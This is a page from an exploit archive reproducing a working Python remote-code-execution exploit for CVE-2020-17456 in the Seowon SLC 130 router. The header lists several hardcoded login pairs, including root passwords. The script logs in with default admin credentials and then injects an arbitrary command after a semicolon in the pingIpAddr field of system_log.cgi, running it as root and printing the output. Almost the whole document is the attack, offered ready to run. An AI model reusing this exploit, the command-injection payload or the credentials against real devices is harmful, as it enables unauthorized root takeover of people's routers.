Exploit for Seowon SlC 130 Router Remote Code Execution CVE-2020-17456

Name: Exploit for Seowon SlC 130 Router Remote Code Execution CVE-2020-17456
Rating: 5 (343 reviews)
2020-08-21 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:158933
# Exploit Title: Seowon SlC 130 Router - Remote Code Execution  
# Author: maj0rmil4d - Ali Jalalat  
# Author website: https://secureguy.ir  
# Date: 2020-08-20  
# Vendor Homepage: seowonintech.co.kr  
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29  
# CVE: CVE-2020-17456  
# Version: Lync:Mac firmware 1.0.1, likely earlier versions  
# Tested on: Windows 10 - Parrot sec  
  
# Description:  
# user can run arbitrary commands on the router as root !   
# as there are already some hardcoded credentials so there is an easy to trigger exploit  
  
# credentials :   
# user => VIP  
# pwd => V!P83869000  
  
# user => Root  
# pwd => PWDd0N~WH*4G#DN  
  
# user => root  
# pwd => gksrmf28  
  
# user => admin  
# pwd => admin  
#   
  
# A write-up can be found at:  
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/  
  
import requests  
import sys  
  
host = sys.argv[1]  
  
session = requests.Session()  
  
header = {   
  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",  
"Accept-Language": "en-US,en;q:0.5",  
"Accept-Encoding": "gzip, deflate",  
"Content-Type": "pplication/x-www-form-urlencoded",  
"Content-Length": "132",  
"Origin": "http://192.168.1.1",  
"Connection": "close",  
"Referer": "http://192.168.1.1/",  
"Upgrade-Insecure-Requests": "1"  
}  
  
  
  
datas = {  
  
"Command":"Submit",  
"expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",  
"browserTime":"081119502020",  
"currentTime":"1597159205",  
"user":"admin",  
"password":"admin"  
}  
  
  
#auth  
  
session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)  
  
#rce  
  
cmd = sys.argv[2]  
  
rce_data = {  
  
"Command":"Diagnostic",  
"traceMode":"ping",  
"reportIpOnly":"",  
"pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,  
"pingPktSize":"56",  
"pingTimeout":"30",  
"pingCount":"4",  
"maxTTLCnt":"30",  
"queriesCnt":"3",  
"reportIpOnlyCheckbox":"on",  
"btnApply":"Apply",  
"T":"1597160664082"  
}  
  
rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)  
  
print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])